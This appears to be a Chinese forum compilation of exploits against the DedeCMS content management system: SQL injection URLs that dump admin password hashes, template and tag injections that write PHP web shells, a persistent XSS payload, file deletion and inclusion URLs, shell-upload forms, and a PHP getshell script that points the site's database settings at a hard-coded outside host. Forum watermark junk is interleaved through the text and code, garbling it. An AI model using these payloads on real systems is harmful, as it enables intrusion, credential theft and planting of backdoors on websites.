|
Dedecms 5.6 rss注入漏洞
http://www.test.com/plus/rss.php?tid=1&_Cs[][1]=1&_Cs[2))%20AND%20%22%27%22%20AND%20updatexml%281,%28SELECT CONCAT%280x5b,uname,0x3a,MID%28pwd,4,16%29,0x5d%29%20FROM%20dede_admin%29,1%29%23'][0]=1
DedeCms v5.6 嵌入恶意代码执行漏洞
+ B5 R$ x d+ t( f1 M. q6 Z注册会员,上传软件:本地地址中填入 a{/dede:link}{dede:toby57 name\="']=0;phpinfo();//"}x{/dede:toby57}1 f& A( W! R3 h& r7 a" U
发表后查看或修改即可执行
8 \; q$ X M- I- U) _a{/dede:link}{dede:toby57 name\="']=0;fputs(fopen(base64_decode(eC5waHA),w),base64_decode(PD9waHAgZXZhbCgkX1BPU1RbeGlhb10pPz5iYWlkdQ));//"}x{/dede:toby57}
生成x.php 密码xiao,直接生成一句话。
Dede 5.6 GBK SQL注入漏洞
8 `$ W0 G: s( V2 H+ s) Dhttp://www.test.com//member/index.php?uid=''%20||%20''''%20||%20''%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7'';; f# [9 P+ e! j( p3 X9 O
http://www.test.com//member/index.php?uid=%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7WFXSSProbe' F+ a* M9 g) ? _! o, D! G
http://www.test.com/member/index.php?uid=%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7! D" X3 X7 j' R6 O
DedeCms V5.6 plus/advancedsearch.php 任意sql语句执行漏洞
http://www.test.com/plus/advancedsearch.php?mid=1&sql=SELECT%20*%20FROM%20`%23@__admin` 7 i2 E8 L* z; K" Y- y
DEDECMS 全版本 gotopage变量XSS漏洞
1.复制粘贴下面的URL访问,触发XSS安装XSS ROOTKIT,注意IE8/9等会拦截URL类型的XSS漏洞,需关闭XSS筛选器。
http://v57.demo.dedecms.com/dede/login.php?gotopage="><script>eval(String.fromCharCode(80,101,114,115,105,115,116,101,110,99,101,95,100,97,116,97,61,39,34,62,60,115,99,114,105,112,116,62,97,108,101,114,116,40,47,120,115,115,32,114,111,111,116,107,105,116,33,47,41,60,47,115,99,114,105,112,116,62,60,120,61,34,39,59,32,13,10,118,97,114,32,100,97,116,101,61,110,101,119,32,68,97,116,101,40,41,59,13,10,118,97,114,32,101,120,112,105,114,101,68,97,121,115,61,51,54,53,59,32,13,10,100,97,116,101,46,115,101,116,84,105,109,101,40,100,97,116,101,46,103,101,116,84,105,109,101,40,41,43,101,120,112,105,114,101,68,97,121,115,42,50,52,42,51,54,48,48,42,49,48,48,48,41,59,13,10,100,111,99,117,109,101,110,116,46,99,111,111,107,105,101,61,39,103,111,116,111,112,97,103,101,61,39,43,80,101,114,115,105,115,116,101,110,99,101,95,100,97,116,97,43,39,59,101,120,112,105,114,101,115,61,39,43,100,97,116,101,46,116,111,71,77,84,83,116,114,105,110,103,40,41,59,13,10,97,108,101,114,116,40,39,88,115,115,32,82,111,111,116,107,105,116,32,73,110,115,116,97,108,108,32,83,117,99,99,101,115,115,102,117,108,32,33,33,33,33,39,41,59))</script><x="" C7 F* n; J# ^' {3 L$ m
2.关闭浏览器,无论怎么访问下面的任意URL,都会触发我们的XSS。
6 ^! |$ a8 n% Z6 r& ohttp://v57.demo.dedecms.com/dede/login.php?gotopage=dasdasdasda
8 R1 q7 U: y& m; a" _- n# ]http://v57.demo.dedecms.com/dede/login.php* n! z$ n: d: C! m5 _9 f/ D
DeDeCMS(织梦)变量覆盖getshell
#!usr/bin/php -w
' N$ W$ X2 m5 U' ?<?php9 q3 ^8 S5 Z ^2 M; c
// Review note: this listing is PHP, not Perl, and the forum's anti-copy
// watermark text is interleaved with the code (also inside string literals),
// so it does not run as pasted; the comments below describe the intended
// flow only as far as the visible code shows it.
//
// Legacy PoC for the DedeCMS "variable override" (变量覆盖) issue named in
// the heading: the POST body built in Getshell() sends
// _COOKIE[GLOBALS][cfg_dbhost|cfg_dbuser|cfg_dbpwd|cfg_dbname|cfg_dbprefix]
// to plus/mytag_js.php, i.e. request data that the affected version
// presumably merged into $GLOBALS as its database settings (inferred from
// the key names; confirm against the vulnerable source). Defensive angle:
// reject request keys that name GLOBALS or cfg_* before any merge, keep
// register_globals off, and alert on requests to plus/mytag_js.php whose
// body or cookies contain "GLOBALS[cfg_", or on unexpected outbound MySQL
// connections from the web tier.
error_reporting(E_ERROR);" u' j- @& }0 A' z ?$ T4 ^
set_time_limit(0);
8 E; @3 j" |1 Y1 e! ~( Aprint_r('
' e) N' i& ^! d2 T. EDEDEcms Variable Coverage- k% H/ [5 i1 H" ?# ~3 ~ x
Exploit Author: www.heixiaozi.comwww.webvul.com
7 h# q- l+ _0 D8 D2 r);
8 A9 `" [4 M- ?) f' p1 pecho "\r\n";: R9 j! q: u$ r% G. f' C: b. \2 P
// Positional arguments: url, aid (1..3 only selects which path the result
// message names) and path. Only $argv[2] is checked; $argv[1] and $argv[3]
// are used as given, with no validation.
if($argv[2]==null){
. H0 Z- y7 x2 R, a+ F5 _" bprint_r('2 W8 N+ i3 X6 K1 |! e
+---------------------------------------------------------------------------+
7 I0 U$ M% D, R* r1 mUsage: php '.$argv[0].' url aid path
7 c; s) d4 B! y+ b, S, Zaid=1 shellpath /data/cache aid=2 shellpath= / aid=3 shellpath=/plus/
+ D$ x3 u4 M3 h: z; I u y" y# tExample:' t& }8 P; Q% l9 Y: Z- @
php '.$argv[0].' www.site.com 1 old
$ K" \5 X) a1 ~" r+---------------------------------------------------------------------------+
6 b/ {! I% W$ c0 S0 q/ {');, T- r3 t' r' J8 d+ Z
exit;& U/ q$ S9 D" a1 e" k9 H {
}( k/ F3 P% K) R8 J
$url=$argv[1];* N. |3 ^/ J2 P) M- h( }0 M; _: o
$aid=$argv[2];
5 W8 T4 n$ ^, S* m$path=$argv[3];8 C1 d- D+ v: H1 Y, b8 i9 k H
// Getshell() returns the first line it reads from the socket (the return
// sits inside its read loop), so $exp is normally the HTTP status line,
// not the response body.
$exp=Getshell($url,$aid,$path);
// Success heuristic: strpos() of "OK" in that first line. For a status
// line such as "HTTP/1.1 200 OK" the offset is 13, so this only reports
// that the server answered 200; it confirms nothing about the file write.
: b. ]" L) U. Zif (strpos($exp,"OK")>12){
, Y6 x, ]& F% V( jecho "
7 X: b& d$ N \+ {* @3 x$ pExploit Success \n";% _2 w0 Z- y# W( |4 _: E$ P b1 W
// The three aid branches only change the path printed; the request body
// in Getshell() is identical for every aid (only the ?aid= query differs).
if($aid==1)echo "2 U" N: T C1 y2 H
Shell:".$url."/$path/data/cache/fuck.php\n" ; W4 b4 Y/ k- G" Q
/ u% F1 C; W4 l
7 ^+ l3 ~4 d; c# U0 K5 D- z; g6 U
if($aid==2)echo ") f! H5 p) e6 N2 ^, p
Shell:".$url."/$path/fuck.php\n" ;
1 I) ^: m6 O) ]* _. L
7 Z" n6 |' o6 j
7 B9 n7 i3 q% }3 eif($aid==3)echo "- c, B' Z* O# A2 I8 j; e. n
Shell:".$url."/$path/plus/fuck.php\n";7 K* }. j) z2 y& Q8 Z2 L
6 ^8 u' \: ^" n
7 {8 U4 K/ @; M; I* x! H( j, H}else{6 B5 [/ f: q9 U- Q3 |0 [' e
echo "% {- ^; @) Y9 I2 |2 o4 ^* U; I# X. U
Exploit Failed \n";
" _! ?; w. Q; F: `}+ N- Y' Z; G# `
// Getshell($url, $aid, $path): opens a plain TCP connection to $url on
// port 80 and writes one hand-built HTTP/1.1 POST to
// /$path/plus/mytag_js.php?aid=$aid. The cfg_db* values in the body
// (host 184.105.174.114, user/db "exploit", prefix "dede_") are hard-coded
// by the original author; treat them as indicators of this tool, not as
// settings. Returns the first line read from the socket; if feof() is
// true at once the function falls off the end and yields NULL.
function Getshell($url,$aid,$path){5 \: e4 X; {* H) ^( _; e0 [+ o
$id=$aid;
% z7 P$ z5 F# r# x/ h0 L$host=$url;/ @( p7 c+ q% O
// $url is used verbatim as both the socket target and the Host header.
$port="80";3 r" w+ h+ q; ^2 V6 t' H
$content ="doaction=http%3A%2F%2F$host%2Fplus%2Fmytag_js.php%3Faid%3D1&_COOKIE%5BGLOBALS%5D%5Bcfg_dbhost%5D=184.105.174.114&_COOKIE%5BGLOBALS%5D%5Bcfg_dbuser%5D=exploit&_COOKIE%5BGLOBALS%5D%5Bcfg_dbpwd%5D=90sec&_COOKIE%5BGLOBALS%5D%5Bcfg_dbname%5D=exploit&_COOKIE%5BGLOBALS%5D%5Bcfg_dbprefix%5D=dede_&nocache=true&QuickSearchBtn=%CC%E1%BD%BB";; |$ s4 E' L( Y* i7 |( N/ S& x' m" @
// Request assembled by hand (no HTTP client). Content-Length is taken
// from $content, but an extra "\r\n" is appended to the body afterwards.
$data = "POST /$path/plus/mytag_js.php?aid=".$id." HTTP/1.1\r\n";1 y# Q8 a n2 x1 a x0 C) P3 h. b
$data .= "Host: ".$host."\r\n";7 G' w* ~, V; b7 x" J% q
$data .= "User-Agent: Mozilla/5.0 (Windows NT 5.2; rv:5.0.1) Gecko/20100101 Firefox/5.0.1\r\n";: ^$ T% C* y3 u6 z
$data .= "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n";& Q( O+ V8 @2 s9 S" I3 t3 ^( b6 |3 g
$data .= "Accept-Language: zh-cn,zh;q=0.5\r\n";4 B. [* P6 ]) p
//$data .= "Accept-Encoding: gzip,deflate\r\n";$ {9 X7 \0 X& W' i( j3 C
$data .= "Accept-Charset: GB2312,utf-8;q=0.7,*;q=0.7\r\n";
0 b) p4 X& A5 D# H' _& b* P/ K" j$data .= "Connection: keep-alive\r\n";/ p( u+ F* A) |: F6 R* `; ?
$data .= "Content-Type: application/x-www-form-urlencoded\r\n";
5 X2 v8 {7 W% k, Y2 Z$data .= "Content-Length: ".strlen($content)."\r\n\r\n";
Y- ~& u8 }& @- b/ z8 S+ A- M$data .= $content."\r\n";
// Plain TCP, no TLS, no explicit timeout.
$ x. h7 i# ^, V, a0 Y$ock=fsockopen($host,$port);
// A connection failure is only printed: there is no return or exit here,
// so fwrite() below is still reached with a false handle.
# W9 i# `2 S# H; v; cif (!$ock) {! C. k) f' X( U
echo "
8 l: _: N. X" FNo response from ".$host."\n";: h2 T6 ~+ R( e5 ?2 C
}8 {- K c: M, U7 } y( o: ~+ r6 C
fwrite($ock,$data);
// The return on the first iteration means at most one line is consumed;
// the socket is never closed explicitly.
3 l3 P, t" [: h' j Hwhile (!feof($ock)) {0 P- T' p$ W- u: ]$ x' B; q
$exp=fgets($ock, 1024);$ E3 S! b2 D, \5 C* X, l: X$ D
return $exp;$ y; G0 j* H8 K0 Z$ k
}
* C, M% d" ~ N}
( h: m# c; G- q0 F0 r4 Z8 _8 s6 n& e
. [4 T" B; e: ~1 y/ ]3 N* r% s6 m?>% V4 l/ s3 k g! W4 v
DedeCms v5.6-5.7 越权访问漏洞(直接进入后台)
" s( r; Q4 D! _6 s+ v1 [- w. `! n2 \http://www.ssvdb.com/织梦网站后台/login.php?dopost=login&validate=dcug&userid=admin&pwd=inimda&_POST[GLOBALS][cfg_dbhost]=116.255.183.90&_POST[GLOBALS][cfg_dbuser]=root&_POST[GLOBALS][cfg_dbpwd]=r0t0&_POST[GLOBALS][cfg_dbname]=root
把上面validate=dcug改为当前的验证码,即可直接进入网站后台
此漏洞的前提是必须得到后台路径才能实现
Dedecms织梦 标签远程文件写入漏洞
前题条件,必须准备好自己的dede数据库,然后插入数据: insert into dede_mytag(aid,normbody) values(1,''{dede:php}$fp = @fopen("1.php", \''a\'');@fwrite($fp, \''\'');echo "OK";@fclose($fp);{/dede:php}'');, Q5 o/ Z) l" T' b; R
2 ^# S7 `) \4 a3 x, f9 z
再用下面表单提交,shell 就在同目录下 1.php。原理自己研究。。。
6 q! F8 b7 O. D* G0 r! c<form action="" method="post" name="QuickSearch" id="QuickSearch">* i" {8 }7 x5 g* @5 ?
<input type="text" value="http://www.tmdsb.com/plus/mytag_js.php?aid=1" name="doaction" style="width:400"><br />9 h$ y7 [% J0 ]4 Q* E4 f+ M' [
<input type="text" value="dbhost" name="_COOKIE[GLOBALS][cfg_dbhost]" style="width:400"><br />* K; u: Y" N& S: Z; S. N O: e
<input type="text" value="dbuser" name="_COOKIE[GLOBALS][cfg_dbuser]" style="width:400"><br />
9 r+ \; n% j( o- d: a- r2 [<input type="text" value="dbpwd" name="_COOKIE[GLOBALS][cfg_dbpwd]" style="width:400"><br />
4 H ]% \: \* k<input type="text" value="dbname" name="_COOKIE[GLOBALS][cfg_dbname]" style="width:400"><br />6 R. k! q/ [: n! U% K& @
<input type="text" value="dede_" name="_COOKIE[GLOBALS][cfg_dbprefix]" style="width:400"><br />6 _# q& Z% X% j! n1 m
<input type="text" value="true" name="nocache" style="width:400">1 W/ X8 N7 V9 o% ?, j
<input type="submit" value="提交" name="QuickSearchBtn"><br /># l3 n7 ~5 b% r! P2 p
</form>+ {! h& p+ |! |
<script>1 F0 I. o) P$ ?' p# Z
// addaction(): points the QuickSearch form at the URL typed into its
// "doaction" text field; the pasted markup shows no call site for it.
function addaction(); t u+ Q, ~2 b, V" { f
{# F$ p7 r D8 u- ^% B- S0 K
document.QuickSearch.action=document.QuickSearch.doaction.value;
: O2 E5 X' S( D* W3 Y* N4 S}
! j& M3 _/ r t4 e9 j+ c7 R3 r+ W</script>% b% k; ?( n _1 k# w7 K5 w, K) a
DedeCms v5.6 嵌入恶意代码执行漏洞
注册会员,上传软件:本地地址中填入a{/dede:link}{dede:toby57 name\="']=0;phpinfo();//"}x{/dede:toby57},发表后查看或修改即可执行
! u" z2 o/ F1 k+ j# P# aa{/dede:link}{dede:toby57 name\="']=0;fputs(fopen(base64_decode(eC5waHA),w),base64_decode(PD9waHAgZXZhbCgkX1BPU1RbeGlhb10pPz5iYWlkdQ));//"}x{/dede:toby57}
生成x.php 密码:xiao直接生成一句话。密码xiao 大家懂得
Dedecms <= V5.6 Final模板执行漏洞
注册一个用户,进入用户管理后台,发表一篇文章,上传一个图片,然后在附件管理里,把图片替换为我们精心构造的模板,比如图片名称是:
uploads/userup/2/12OMX04-15A.jpg
模板内容是(如果限制图片格式,加gif89a):
% s; G2 e. n: P6 i! q: p{dede:name runphp='yes'}. C+ |' O K' w/ N
$fp = @fopen("1.php", 'a');1 }. h) z" E# [/ D! ~
@fwrite($fp, '<'.'?php'."\r\n\r\n".'eval($_POST[cmd])'."\r\n\r\n?".">\r\n");
& }0 d$ n$ r/ G6 i+ s/ q! A' f1 N@fclose($fp);
; @! F4 A6 g; }# m: g{/dede:name}
2 修改刚刚发表的文章,查看源文件,构造一个表单:
<form class="mTB10 mL10 mR10" name="addcontent" id="addcontent" action="http://127.0.0.1/dede/member/article_edit.php" method="post" enctype="multipart/form-data">3 ^4 G K: ^$ y C( f* |
<input type="hidden" name="dopost" value="save" />/ ~& i0 {0 r1 f5 U: K/ t7 v1 h
<input type="hidden" name="aid" value="2" />
4 e& U1 E7 x% U<input type="hidden" name="idhash" value="f5f682c8d76f74e810f268fbc97ddf86" />
8 p2 \7 I. U" ?% ]<input type="hidden" name="channelid" value="1" />
; V5 X/ e8 \9 c; O7 n3 ?<input type="hidden" name="oldlitpic" value="" />
( f. F. C3 N* {! g1 Z% W; _<input type="hidden" name="sortrank" value="1275972263" />
<div id="mainCp">: ?7 L+ W& M. X
<h3 class="meTitle"><strong>修改文章</strong></h3>
4 `% b4 @! p2 C<div class="postForm">4 \% D3 g/ E# W7 D7 Q5 s9 w0 F6 c" W
<label>标题:</label>
. ~% c, c. J2 j' U, z<input name="title" type="text" id="title" value="11233ewsad" maxlength="100" class="intxt"/>
<label>标签TAG:</label>
2 b+ T( [- H$ Q' a<input name="tags" type="text" id="tags" value="hahah,test" maxlength="100" class="intxt"/>(用逗号分开)% P, O& c0 d/ S) J) V4 L
) f6 N* u8 A& Y; N" V& E3 c+ @<label>作者:</label>
! D3 f n W, O; ~6 m<input type="text" name="writer" id="writer" value="test" maxlength="100" class="intxt" style="width:219px"/>
<label>隶属栏目:</label>( p1 b/ W# i: @5 u6 x% G
<select name='typeid' size='1'>: h! B+ w4 V5 T( }* v
<option value='1' class='option3' selected=''>测试栏目</option>
+ s* Q- u: U" G8 L5 ] J</select> <span style="color:#F00">*</span>(不能选择带颜色的分类)' d4 F# ~' }, B- I
<label>我的分类:</label>
+ R. s9 Y" ~; B, H<select name='mtypesid' size='1'>$ ~ T) U2 ^- I3 c4 R6 u+ H m; V
<option value='0' selected>请选择分类...</option>
0 z/ F% \5 V5 h<option value='1' class='option3' selected>hahahha</option>1 X6 X$ V" f4 ^
</select>' b! A5 T0 B1 N" G
<label>信息摘要:</label>$ M, V4 [3 W; H. I1 U5 ~
<textarea name="description" id="description">1111111</textarea>' I' [7 s" H" j" e% C, q/ Z
(内容的简要说明)
<label>缩略图:</label>, a! F- e8 i0 e7 _) r0 N
<input name="litpic" type="file" id="litpic" maxlength="100" class="intxt"/>
<input type='text' name='templet'8 [0 n7 W, J8 f1 m$ ]& x
value="../ uploads/userup/2/12OMX04-15A.jpg"># t% v+ t) D/ n4 G" `( f2 H5 [
<input type='text' name='dede_addonfields'
# Z9 u7 F6 e Ivalue="templet,htmltext;">(这里构造)
3 {- s e: k7 z* M</div>
<!-- 表单操作区域 -->5 ]2 @) q# u! j& e% F x( K) R
<h3 class="meTitle">详细内容</h3>3 I/ X' v3 o, f# Q& m
<div class="contentShow postForm">
b7 M/ ]# `3 y0 y<input type="hidden" id="body" name="body" value="<div><a href="http://127.0.0.1/dede/uploads/userup/2/12OMX04-15A.jpg" target="_blank"><img border="0" alt="" src="http://127.0.0.1/dede/uploads/userup/2/12OMX04-15A.jpg" width="1010" height="456" /></a></div> <p><?phpinfo()?>1111111</p>" style="display:none" /><input type="hidden" id="body___Config" value="FullPage=false" style="display:none" /><iframe id="body___Frame" src="/dede/include/FCKeditor/editor/fckeditor.html?InstanceName=body&Toolbar=Member" width="100%" height="350" frameborder="0" scrolling="no"></iframe>; w, B( d& j" Q6 P) [+ }# W, F$ w
6 B& R w8 R! a* b<label>验证码:</label>. @0 g8 H7 y& s, ~+ M4 v
<input name="vdcode" type="text" id="vdcode" maxlength="100" class="intxt" style='width:50px;text-transform:uppercase;' />
3 o! f; z# }2 k( J<img src="http://127.0.0.1 /dede/include/vdimgck.php" alt="看不清?点击更换" align="absmiddle" style="cursor:pointer" />
8 z3 h6 q8 t9 {# e+ h+ ~$ E<button class="button2" type="submit">提交</button>
8 @' k7 r9 w; ~. g, A7 H) o<button class="button2 ml10" type="reset">重置</button>
* K3 }! w0 V. a! _! r8 t3 Z</div>, i. k5 R! k5 G+ \/ d0 B7 k! M
</div>
" k" M" t# \; z' x9 k6 Z0 [
! E- [5 Q. n2 p. d
% \$ [* @* O' B$ i% Y</form> \5 s+ m2 m- P9 `4 Q( |- E
提交,提示修改成功,则我们已经成功修改模板路径。 3 访问修改的文章:
假设刚刚修改的文章的aid为2,则我们只需要访问:
* [& R7 q4 h1 T. k& u/ Thttp://127.0.0.1/dede/plus/view.php?aid=2
即可以在plus目录下生成webshell:1.php
DEDECMS网站管理系统Get Shell漏洞(5.3/5.6)
Gif89a{dede:field name='toby57' runphp='yes'}- v* i/ _2 X7 ~) k; ?. _3 H
phpinfo();( |7 g0 S( u( O3 t, w
{/dede:field}
保存为1.gif
<form action="http://192.168.1.5/DedeCmsV5.6-GBK-Final/uploads/member/uploads_edit.php" method="post" enctype="multipart/form-data" ">
6 f* I' N' z) ]" v<input type="hidden" name="aid" value="7" /> $ }; w; b$ f& [- k: j) ^) E( K
<input type="hidden" name="mediatype" value="1" />
8 F/ h& O @5 f( W6 T" B<input type="text" name="oldurl" value="/DedeCmsV5.6-GBK-Final/uploads/uploads/userup/3/1.gif" /></br> * ^/ c& c! Y2 { G- K @# x0 z7 A
<input type="hidden" name="dopost" value="save" /> ( @- ~$ o7 `+ _% |4 ]
<input name="title" type="hidden" id="title" value="1.jpg" class="intxt"/>
* C! s6 A, ?! ^1 S' e! X: _<input name="addonfile" type="file" id="addonfile"/>
! X" f2 ?0 I/ l) k) u( _" g<button class="button2" type="submit" >更改</button>
( V* \/ F, W" y7 B+ H" w8 V1 O</form> , A$ I# X* c- A* ^
构造如上表单,上传后图片保存为/uploads/userup/3/1.gif
发表文章,然后构造修改表单如下:
# z8 Z# e Y# V% m) ?3 H<form action="http://192.168.1.5/DedeCmsV5.6-GBK-Final/uploads/member/article_edit.php" method="post" enctype="multipart/form-data">
5 ? o) x; D* D& J* J<input type="hidden" name="dopost" value="save" />
% F8 |. }/ L( b3 q<input type="hidden" name="aid" value="2" /> 4 h6 D! p% P8 k
<input type="hidden" name="idhash" value="ec66030e619328a6c5115b55483e8dbd" /> / B$ m+ @; j* K: t$ [+ D5 x# j" M- M
<input type="hidden" name="channelid" value="1" /> ) R- ?6 M1 W! e- @
<input type="hidden" name="oldlitpic" value="" />
2 N- {$ {: |+ ^* J0 p" k* I- G) l) j<input type="hidden" name="sortrank" value="1282049150" />
% P1 p) e. i+ @) ` ]) i<input name="title" type="text" id="title" value="aaaaaaaaaaaaaaa" maxlength="100" class="intxt"/> 8 o/ c7 U$ L$ r1 r8 C6 E, ?
<input type="text" name="writer" id="writer" value="123456" maxlength="100" class="intxt" style="width:219px"/> ! H6 [0 {* Y7 C: v2 h3 Y, |
<select name='typeid' size='1'>
+ o' u6 i' ^( x9 [* L! @<option value='1' class='option3' selected=''>Test</option>
) i8 p8 @ X+ A- @4 Q6 D<select name='mtypesid' size='1'>
; Z/ B7 d2 x& N% \9 H<option value='0' selected>请选择分类...</option>
" v2 Y* w! l; T* Z9 M<option value='1' class='option3' selected>aa</option></select>
6 y' ], }) h3 C0 E5 V' |: A1 n<textarea name="description" id="description">aaaaaaaaaaaaa</textarea>
, o5 c; Z& y- U2 e0 u<input type='hidden' name='dede_addonfields' value="templet"> 1 M8 e) [. O1 I! ?5 y( O
<input type='hidden' name='templet' value="../uploads/userup/3/1.gif"> 8 n$ Q. J1 }, u! W, l
<input type="hidden" id="body" name="body" value="aaaa" style="display:none" /> ( j$ i, o7 s4 x4 B
<button class="button2" type="submit">提交</button>
& n: E* M) _+ }* ]( p$ \3 Y</form>
织梦(Dedecms)V5.6 远程文件删除漏洞
http://test.com/member/edit_face.php?dopost=delold&oldface=/uploads/userup/8/../../../member/templets/images/m_logo.gif, a# `4 e9 b* Q# d2 l
织梦(Dedecms) V5.6 plus/carbuyaction.php 本地文件包含漏洞
http://www.test.com/plus/carbuya ... urn&code=../../
DedeCms V5.6 plus/advancedsearch.php 任意sql语句执行漏洞
. l/ `: ]) M1 gplus/advancedsearch.php?mid=1&sql=SELECT%20*%20FROM%20`%23@__admin`
9 r$ E' i* M' a2 {密码是32位MD5减去头5位,减去尾七位,得到20 MD5密码,方法是,前减3后减1,得到16位MD50 H3 j7 y* z* C/ m
织梦(Dedecms) 5.1 feedback_js.php 注入漏洞
6 H( s5 z; k. g2 b D, vhttp://st0p/dedecms51/plus/feedback_js.php?arcurl=' union select "' and 1=2 union select 1,1,1,userid,3,1,3,3,pwd,1,1,3,1,1,1,1,1 from dede_admin where 1=1 union select * from dede_feedback where 1=2 and ''='" from dede_admin where ''='
织梦(Dedecms)select_soft_post.php页面变量未初始漏洞
<html>, j1 b: ^+ x1 q6 v- o
<head>
4 t1 ?; Y* J% X<title>Dedecms v55 RCE Exploit Codz By flyh4t</title>
5 B; r) ~. D0 b! S</head>
- O$ E$ R) H8 P5 A, T! [<body style="FONT-SIZE: 9pt">
; l, G5 T7 m0 `* U' a---------- Dedecms v55 RCE Exploit Codz By flyh4t---------- <br /><br />8 t0 R! k; {3 l. i8 R5 m
<form action=http://www.nuanyue.com/uploads/include/dialog/select_soft_post.php method='POST' enctype="multipart/form-data" name='myform'>
! c. L9 Z1 z/ v) [+ _<input type='hidden' name='activepath' value='/data/cache/' />
1 f+ G) e! E5 A. F<input type='hidden' name='cfg_basedir' value='../../' />
/ d7 V+ a! l- Y$ H<input type='hidden' name='cfg_imgtype' value='php' /># }9 `0 {% R8 G+ C( X) c
<input type='hidden' name='cfg_not_allowall' value='txt' />
! m' o6 }7 r' n+ X<input type='hidden' name='cfg_softtype' value='php' />2 O9 h! Q7 _. Y9 f- i& ]7 C
<input type='hidden' name='cfg_mediatype' value='php' />
# Z( N* l; y3 `6 y6 K<input type='hidden' name='f' value='form1.enclosure' />
6 r' Q z* F; b<input type='hidden' name='job' value='upload' />6 g8 H/ d; p/ D/ l8 v1 ?
<input type='hidden' name='newname' value='fly.php' />/ e# k( l' F( k- ~) a+ W: W
Select U Shell <input type='file' name='uploadfile' size='25' />
$ b( y& t9 a: p4 V1 `: C" Y<input type='submit' name='sb1' value='确定' />
! C T' p7 }9 d/ J0 D3 S</form>
4 K3 h: k# n* v8 i& a. x<br />It's just a exp for the bug of Dedecms V55...<br />1 Q, @2 a, u8 ~+ i6 I, |
Need register_globals = on...<br />: k# L+ E1 {4 O: c# U4 V
Fun the game,get a webshell at /data/cache/fly.php...<br />% o9 l9 @% S. n
</body>0 ] a- I+ \4 K5 I* u3 d& ~
</html>
织梦(dedecms)5.3 – 5.5 plus/digg_frame.php 注入漏洞
利用了MySQL字段数值溢出引发错误和DEDECMS用PHP记录数据库错误信息并且文件头部没有验证的漏洞。
1. 访问网址:
http://www.abc.com/plus/digg_fra ... 024%651024&mid=*/eval($_POST[x]);var_dump(3);?>3 w& R! ?) j" B) @* _; }
可看见错误信息
2. 访问 http://www.abc.com/data/mysql_error_trace.php 看到以下信息证明注入成功了。
int(3) Error: Illegal double '1024e1024' value found during parsing
$ S2 f. Q; V8 R. V9 ~+ n0 G( n6 lError sql: Select goodpost,badpost,scores From `gxeduw_archives` where id=1024e1024 limit 0,1; */ ?>
3. 执行dede.rar里的文件 test.html,注意 form 中 action 的地址是
. q* R1 ?. ~! z5 K' H<form action=”http://www.abc.com/data/mysql_error_trace.php” enctype=”application/x-www-form-urlencoded” method=”post”>
按确定后的看到第2步骤的信息表示文件木马上传成功.
织梦(DedeCms)plus/infosearch.php 文件注入漏洞
http://localhost/plus/infosearch.php?action=search&q=%cf'%20union%20select%201,2,userid,4,pwd,6%20from%20dede_admin/* |
|